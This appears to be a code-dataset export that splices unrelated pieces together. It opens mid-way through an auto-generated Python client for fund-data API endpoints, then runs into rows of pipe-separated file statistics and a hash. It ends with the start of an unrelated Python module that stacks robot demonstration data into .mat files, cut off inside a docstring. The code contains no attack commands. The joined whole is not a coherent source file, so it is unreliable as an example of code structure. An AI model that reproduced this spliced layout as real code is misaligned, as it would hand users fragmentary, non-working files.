        forwarded unchanged to the generated endpoint.

    Returns:
        InlineResponse2006: Response object.
        int: HTTP status code.
        dict: Dictionary of the response headers.
    """
    # Blocking flavour that keeps the full HTTP envelope.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs.update(id=id)
    return self.get_fund_share_class_get_endpoint.call_with_http_info(**kwargs)
def get_fund_share_class_get_async(
    self,
    id,
    **kwargs
) -> "ApplyResult[InlineResponse2006]":
    """Fundamental data for a share class of a fund.  # noqa: E501

    The fundamental data comprises share class-specific data plus data that
    applies to the fund (and thus all its share classes). Instruments other
    than fund share classes yield empty values for those attributes. Dates
    are interpreted in the timezone of the fund company; see endpoint
    `/basic/region/country/list` for possible country values.

    Asynchronous HTTP request. Returns an ApplyResult wrapping only the
    deserialized response body.

    Args:
        id (str): Identifier of the instrument.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        ApplyResult[InlineResponse2006]
    """
    # Async flavour returning the body only, dispatched via the thread pool.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs.update(id=id)
    return self.get_fund_share_class_get_endpoint.call_with_http_info(**kwargs)
def get_fund_share_class_get_with_http_info_async(
    self,
    id,
    **kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2006, int, typing.MutableMapping]]":
    """Fundamental data for a share class of a fund.  # noqa: E501

    The fundamental data comprises share class-specific data plus data that
    applies to the fund (and thus all its share classes). Instruments other
    than fund share classes yield empty values for those attributes. Dates
    are interpreted in the timezone of the fund company; see endpoint
    `/basic/region/country/list` for possible country values.

    Asynchronous HTTP request. Returns an ApplyResult wrapping the tuple
    (response body, HTTP status code, response headers).

    Args:
        id (str): Identifier of the instrument.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        ApplyResult[(InlineResponse2006, int, typing.Dict)]
    """
    # Async flavour that keeps the full HTTP envelope.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs.update(id=id)
    return self.get_fund_share_class_get_endpoint.call_with_http_info(**kwargs)
def post_fund_issuer_search(
    self,
    **kwargs
) -> InlineResponse2001:
    """Search for issuers of funds.  # noqa: E501

    FactSet does not consolidate the data provided by different suppliers,
    so the result may contain more than one identifier for a given issuer.
    The response is limited to 100 results.

    Synchronous HTTP request. Returns only the deserialized response body.

    Keyword Args:
        body (InlineObject): [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        InlineResponse2001: Response object.
    """
    # No path parameters: everything (including the optional body) already
    # travels through **kwargs.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    return self.post_fund_issuer_search_endpoint.call_with_http_info(**kwargs)
def post_fund_issuer_search_with_http_info(
    self,
    **kwargs
) -> typing.Tuple[InlineResponse2001, int, typing.MutableMapping]:
    """Search for issuers of funds.  # noqa: E501

    FactSet does not consolidate the data provided by different suppliers,
    so the result may contain more than one identifier for a given issuer.
    The response is limited to 100 results.

    Synchronous HTTP request. Returns the tuple
    (response body, HTTP status code, response headers).

    Keyword Args:
        body (InlineObject): [optional]
        Underscore-prefixed request options (`_preload_content`,
        `_request_timeout`, `_check_input_type`, `_check_return_type`,
        `_spec_property_naming`, `_content_type`, `_host_index`) are
        forwarded unchanged to the generated endpoint.

    Returns:
        InlineResponse2001: Response object.
        int: HTTP status code.
        dict: Dictionary of the response headers.
    """
    # Blocking flavour that keeps the full HTTP envelope.
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    return self.post_fund_issuer_search_endpoint.call_with_http_info(**kwargs)
def post_fund_issuer_search_async(
    self,
    **kwargs
) -> "ApplyResult[InlineResponse2001]":
    """Search for issuers of funds. # noqa: E501
    Search for issuers of funds. FactSet does not consolidate the data provided by different suppliers, therefore the result may contain more than one identifier for a given issuer. The response is limited to 100 results. # noqa: E501
    This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
    Keyword Args:
        body (InlineObject): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        ApplyResult[InlineResponse2001]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    return self.post_fund_issuer_search_endpoint.call_with_http_info(**kwargs)
def post_fund_issuer_search_with_http_info_async(
    self,
    **kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2001, int, typing.MutableMapping]]":
    """Search for issuers of funds. # noqa: E501
    Search for issuers of funds. FactSet does not consolidate the data provided by different suppliers, therefore the result may contain more than one identifier for a given issuer. The response is limited to 100 results. # noqa: E501
    This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
    Keyword Args:
        body (InlineObject): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        ApplyResult[(InlineResponse2001, int, typing.Dict)]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    return self.post_fund_issuer_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_search(
    self,
    **kwargs
) -> InlineResponse2004:
    """Screener for notations of share classes of mutual and exchange traded funds based on fund-specific parameters. # noqa: E501
    Screener for notations of share classes of mutual and exchange traded funds (ETF) based on fund-specific parameters. The funds represent legal entities, juristic persons in particular, and may have more than one share class. The share classes represent instruments, and the notations represent price sources for the share classes. Some parameters apply to the fund as a whole, i.e. a notation for each share class of a fund matching the criteria is returned, for example `issuer.selection`. Others apply to the share classes, thus only notations of matching share classes are returned, for example `minimumInvestment.initial`. The result is limited to the notations that satisfy all the selected filters. In order to guarantee comparability when using the performance parameters, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`) and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. A specific set of share classes or share class notations can be restricted to or excluded by using customer-specific instrument or notation selection lists respectively. Such selection lists are set up by FactSet upon request. All identifiers used as parameters must be valid and entitled. # noqa: E501
    This method makes a synchronous HTTP request. Returns the http data only
    Keyword Args:
        body (InlineObject1): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        InlineResponse2004
            Response Object
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    return self.post_fund_notation_screener_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_search_with_http_info(
    self,
    **kwargs
) -> typing.Tuple[InlineResponse2004, int, typing.MutableMapping]:
    """Screener for notations of share classes of mutual and exchange traded funds based on fund-specific parameters. # noqa: E501
    Screener for notations of share classes of mutual and exchange traded funds (ETF) based on fund-specific parameters. The funds represent legal entities, juristic persons in particular, and may have more than one share class. The share classes represent instruments, and the notations represent price sources for the share classes. Some parameters apply to the fund as a whole, i.e. a notation for each share class of a fund matching the criteria is returned, for example `issuer.selection`. Others apply to the share classes, thus only notations of matching share classes are returned, for example `minimumInvestment.initial`. The result is limited to the notations that satisfy all the selected filters. In order to guarantee comparability when using the performance parameters, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`) and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. A specific set of share classes or share class notations can be restricted to or excluded by using customer-specific instrument or notation selection lists respectively. Such selection lists are set up by FactSet upon request. All identifiers used as parameters must be valid and entitled. # noqa: E501
    This method makes a synchronous HTTP request. Returns http data, http status and headers
    Keyword Args:
        body (InlineObject1): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        InlineResponse2004
            Response Object
        int
            Http Status Code
        dict
            Dictionary of the response headers
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    return self.post_fund_notation_screener_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_search_async(
    self,
    **kwargs
) -> "ApplyResult[InlineResponse2004]":
    """Screener for notations of share classes of mutual and exchange traded funds based on fund-specific parameters. # noqa: E501
    Screener for notations of share classes of mutual and exchange traded funds (ETF) based on fund-specific parameters. The funds represent legal entities, juristic persons in particular, and may have more than one share class. The share classes represent instruments, and the notations represent price sources for the share classes. Some parameters apply to the fund as a whole, i.e. a notation for each share class of a fund matching the criteria is returned, for example `issuer.selection`. Others apply to the share classes, thus only notations of matching share classes are returned, for example `minimumInvestment.initial`. The result is limited to the notations that satisfy all the selected filters. In order to guarantee comparability when using the performance parameters, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`) and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. A specific set of share classes or share class notations can be restricted to or excluded by using customer-specific instrument or notation selection lists respectively. Such selection lists are set up by FactSet upon request. All identifiers used as parameters must be valid and entitled. # noqa: E501
    This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
    Keyword Args:
        body (InlineObject1): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        ApplyResult[InlineResponse2004]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    return self.post_fund_notation_screener_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_search_with_http_info_async(
    self,
    **kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2004, int, typing.MutableMapping]]":
    """Screener for notations of share classes of mutual and exchange traded funds based on fund-specific parameters. # noqa: E501
    Screener for notations of share classes of mutual and exchange traded funds (ETF) based on fund-specific parameters. The funds represent legal entities, juristic persons in particular, and may have more than one share class. The share classes represent instruments, and the notations represent price sources for the share classes. Some parameters apply to the fund as a whole, i.e. a notation for each share class of a fund matching the criteria is returned, for example `issuer.selection`. Others apply to the share classes, thus only notations of matching share classes are returned, for example `minimumInvestment.initial`. The result is limited to the notations that satisfy all the selected filters. In order to guarantee comparability when using the performance parameters, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`) and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. A specific set of share classes or share class notations can be restricted to or excluded by using customer-specific instrument or notation selection lists respectively. Such selection lists are set up by FactSet upon request. All identifiers used as parameters must be valid and entitled. # noqa: E501
    This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
    Keyword Args:
        body (InlineObject1): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        ApplyResult[(InlineResponse2004, int, typing.Dict)]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    return self.post_fund_notation_screener_search_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_value_ranges_get(
    self,
    **kwargs
) -> InlineResponse2005:
    """Possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. # noqa: E501
    The endpoint returns the possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. It allows to request the values and value ranges only for a restricted set of notations that match predefined parameters. The functionality may be used to pre-fill the values and value ranges of the parameters of the `/fund/notation/screener/search` endpoint so that performing a search always leads to a non-empty set of notations. In order to guarantee comparability when using the performance parameter, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`), and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. # noqa: E501
    This method makes a synchronous HTTP request. Returns the http data only
    Keyword Args:
        body (InlineObject2): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        InlineResponse2005
            Response Object
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    return self.post_fund_notation_screener_value_ranges_get_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_value_ranges_get_with_http_info(
    self,
    **kwargs
) -> typing.Tuple[InlineResponse2005, int, typing.MutableMapping]:
    """Possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. # noqa: E501
    The endpoint returns the possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. It allows to request the values and value ranges only for a restricted set of notations that match predefined parameters. The functionality may be used to pre-fill the values and value ranges of the parameters of the `/fund/notation/screener/search` endpoint so that performing a search always leads to a non-empty set of notations. In order to guarantee comparability when using the performance parameter, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`), and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. # noqa: E501
    This method makes a synchronous HTTP request. Returns http data, http status and headers
    Keyword Args:
        body (InlineObject2): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        InlineResponse2005
            Response Object
        int
            Http Status Code
        dict
            Dictionary of the response headers
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    return self.post_fund_notation_screener_value_ranges_get_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_value_ranges_get_async(
    self,
    **kwargs
) -> "ApplyResult[InlineResponse2005]":
    """Possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. # noqa: E501
    The endpoint returns the possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. It allows to request the values and value ranges only for a restricted set of notations that match predefined parameters. The functionality may be used to pre-fill the values and value ranges of the parameters of the `/fund/notation/screener/search` endpoint so that performing a search always leads to a non-empty set of notations. In order to guarantee comparability when using the performance parameter, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`), and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. # noqa: E501
    This method makes an asynchronous HTTP request. Returns the http data, wrapped in ApplyResult
    Keyword Args:
        body (InlineObject2): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        ApplyResult[InlineResponse2005]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    return self.post_fund_notation_screener_value_ranges_get_endpoint.call_with_http_info(**kwargs)
def post_fund_notation_screener_value_ranges_get_with_http_info_async(
    self,
    **kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse2005, int, typing.MutableMapping]]":
    """Possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. # noqa: E501
    The endpoint returns the possible values and value ranges for the parameters used in the endpoint `/fund/notation/screener/search`. It allows to request the values and value ranges only for a restricted set of notations that match predefined parameters. The functionality may be used to pre-fill the values and value ranges of the parameters of the `/fund/notation/screener/search` endpoint so that performing a search always leads to a non-empty set of notations. In order to guarantee comparability when using the performance parameter, the endpoint is restricted to three markets only, Mountain-View Funds (`id=1126`), FactSet Fund Prices (`id=1127`), and WM Datenservice (`id=1050`) since the notations from these markets provide a net asset value (NAV) - based total performance. The total performance factors in all earnings distributions of a share class and thus allows to compare the overall (total) performance of distributing and non-distributing share classes. # noqa: E501
    This method makes an asynchronous HTTP request. Returns http data, http status and headers, wrapped in ApplyResult
    Keyword Args:
        body (InlineObject2): [optional]
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (int/float/tuple): timeout setting for this request. If
            one number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _spec_property_naming (bool): True if the variable names in the input data
            are serialized names, as specified in the OpenAPI document.
            False if the variable names in the input data
            are pythonic names, e.g. snake case (default)
        _content_type (str/None): force body content-type.
            Default is None and content-type will be predicted by allowed
            content-types and body.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
    Returns:
        ApplyResult[(InlineResponse2005, int, typing.Dict)]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    return self.post_fund_notation_screener_value_ranges_get_endpoint.call_with_http_info(**kwargs)
| 50.299253
| 1,530
| 0.5899
| 17,757
| 154,972
| 5.002309
| 0.02461
| 0.026749
| 0.030802
| 0.018823
| 0.973375
| 0.969998
| 0.961464
| 0.954473
| 0.95167
| 0.949137
| 0
| 0.011743
| 0.346624
| 154,972
| 3,080
| 1,531
| 50.315584
| 0.865508
| 0.601657
| 0
| 0.757991
| 0
| 0
| 0.172719
| 0.075382
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035008
| false
| 0
| 0.012938
| 0
| 0.082192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
39d2f09a3950e4a1e7a26add45a1c3148a8532d8
| 18,115
|
py
|
Python
|
python/dmp_coupling/utilities/DataStacking.py
|
gsutanto/dmp
|
4f4492cf4295d9c3fe0ba9ce2fb726bf37be40df
|
[
"MIT"
] | null | null | null |
python/dmp_coupling/utilities/DataStacking.py
|
gsutanto/dmp
|
4f4492cf4295d9c3fe0ba9ce2fb726bf37be40df
|
[
"MIT"
] | null | null | null |
python/dmp_coupling/utilities/DataStacking.py
|
gsutanto/dmp
|
4f4492cf4295d9c3fe0ba9ce2fb726bf37be40df
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""Created on Mon Oct 30 19:00:00 2017
@author: gsutanto
"""
import numpy as np
import os
import sys
import copy
import glob
import scipy.io as sio
def prepareData(task_type,
                dataset_Ct,
                subset_settings_indices,
                considered_subset_outlier_ranked_demo_indices,
                generalization_subset_outlier_ranked_demo_indices,
                post_filename_stacked_data,
                out_data_dir=''):
  """Stack demonstration data into training and generalization-test sets.

  Splits the considered outlier-ranked demo indices into a training subset
  (considered minus generalization) and a generalization-test subset, then
  stacks the per-demonstration data of each movement primitive via
  stackDataset(). If out_data_dir is an existing directory, each stacked
  array is additionally saved there as a .mat file.

  Args:
    task_type: Task name string, embedded into the output .mat filenames.
    dataset_Ct: Dict of per-primitive/per-setting demonstration data; its
      'sub_Ct_target' entry determines the number of primitives.
    subset_settings_indices: Indices of the settings to extract.
    considered_subset_outlier_ranked_demo_indices: All outlier-ranked demo
      indices to use (training plus generalization test).
    generalization_subset_outlier_ranked_demo_indices: Outlier-ranked demo
      indices reserved for the generalization test.
    post_filename_stacked_data: Suffix appended to output .mat filenames.
    out_data_dir: Output directory; when it does not exist, nothing is
      written to disk.

  Returns:
    Tuple (X, Ct_target, normalized_phase_PSI_mult_phase_V,
    data_point_priority); each element is a 2 x N_primitive nested list
    indexed as [dataset_type][primitive], where dataset_type 0 is training
    and 1 is the generalization test.
  """
  feature_type = 'raw'
  mode_stack_dataset = 1  # stack by outlier-ranked demo indices
  N_primitive = len(dataset_Ct['sub_Ct_target'])
  training_subset_outlier_ranked_demo_indices = list(
      set(considered_subset_outlier_ranked_demo_indices) -
      set(generalization_subset_outlier_ranked_demo_indices))
  if not generalization_subset_outlier_ranked_demo_indices:
    # CANNOT really be empty (for further Python processing)
    generalization_subset_outlier_ranked_demo_indices = [1]
  list_subset_outlier_ranked_demo_indices = [
      training_subset_outlier_ranked_demo_indices,
      generalization_subset_outlier_ranked_demo_indices
  ]
  list_pre_filename_stacked_data = ['', 'test_unroll_']
  X = [[None] * N_primitive for j in range(2)]
  Ct_target = [[None] * N_primitive for j in range(2)]
  normalized_phase_PSI_mult_phase_V = [[None] * N_primitive for j in range(2)]
  data_point_priority = [[None] * N_primitive for j in range(2)]
  for ntype in range(len(list_pre_filename_stacked_data)):
    # NOTE: the primitive loop variable was previously named `np`, which
    # shadowed the module-level numpy alias; renamed to avoid that hazard.
    for n_prim in range(N_primitive):
      [
          X[ntype][n_prim], Ct_target[ntype][n_prim],
          normalized_phase_PSI_mult_phase_V[ntype][n_prim],
          data_point_priority[ntype][n_prim]
      ] = stackDataset(dataset_Ct, subset_settings_indices, mode_stack_dataset,
                       list_subset_outlier_ranked_demo_indices[ntype],
                       feature_type, n_prim)
      # All stacked arrays must have one row per data point.
      assert (X[ntype][n_prim].shape[0] == Ct_target[ntype][n_prim].shape[0])
      assert (X[ntype][n_prim].shape[0] ==
              normalized_phase_PSI_mult_phase_V[ntype][n_prim].shape[0])
      assert (X[ntype][n_prim].shape[0] ==
              data_point_priority[ntype][n_prim].shape[0])
      if (os.path.isdir(out_data_dir)):
        X_dict = {}
        Ct_target_dict = {}
        normalized_phase_PSI_mult_phase_V_dict = {}
        data_point_priority_dict = {}
        X_dict['X'] = X[ntype][n_prim]
        Ct_target_dict['Ct_target'] = Ct_target[ntype][n_prim]
        normalized_phase_PSI_mult_phase_V_dict[
            'normalized_phase_PSI_mult_phase_V'] = normalized_phase_PSI_mult_phase_V[
                ntype][n_prim]
        data_point_priority_dict['data_point_priority'] = data_point_priority[
            ntype][n_prim]
        sio.savemat(
            (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
             'prim_' + str(n_prim + 1) + '_X_' + feature_type + '_' +
             task_type + post_filename_stacked_data + '.mat'), X_dict)
        sio.savemat(
            (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
             'prim_' + str(n_prim + 1) + '_Ct_target_' + task_type +
             post_filename_stacked_data + '.mat'), Ct_target_dict)
        sio.savemat(
            (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
             'prim_' + str(n_prim + 1) + '_normalized_phase_PSI_mult_phase_V_' +
             task_type + post_filename_stacked_data + '.mat'),
            normalized_phase_PSI_mult_phase_V_dict)
        sio.savemat(
            (out_data_dir + '/' + list_pre_filename_stacked_data[ntype] +
             'prim_' + str(n_prim + 1) + '_data_point_priority_' + task_type +
             post_filename_stacked_data + '.mat'), data_point_priority_dict)
        if (ntype == 0):
          print('Total # of Data Points for Training Primitive ' +
                str(n_prim + 1) + ': ' + str(X[ntype][n_prim].shape[0]))
        elif (ntype == 1):
          print('Total # of Data Points for Generalization Test Primitive ' +
                str(n_prim + 1) + ': ' + str(X[ntype][n_prim].shape[0]))
  return X, Ct_target, normalized_phase_PSI_mult_phase_V, data_point_priority
def stackDataset(dataset,
                 subset_settings_indices,
                 mode,
                 mode_arg,
                 feature_type,
                 primitive_no,
                 fraction_data_points_included_per_demo_traj=1.0):
    """Stack selected demonstrations of one primitive into flat data matrices.

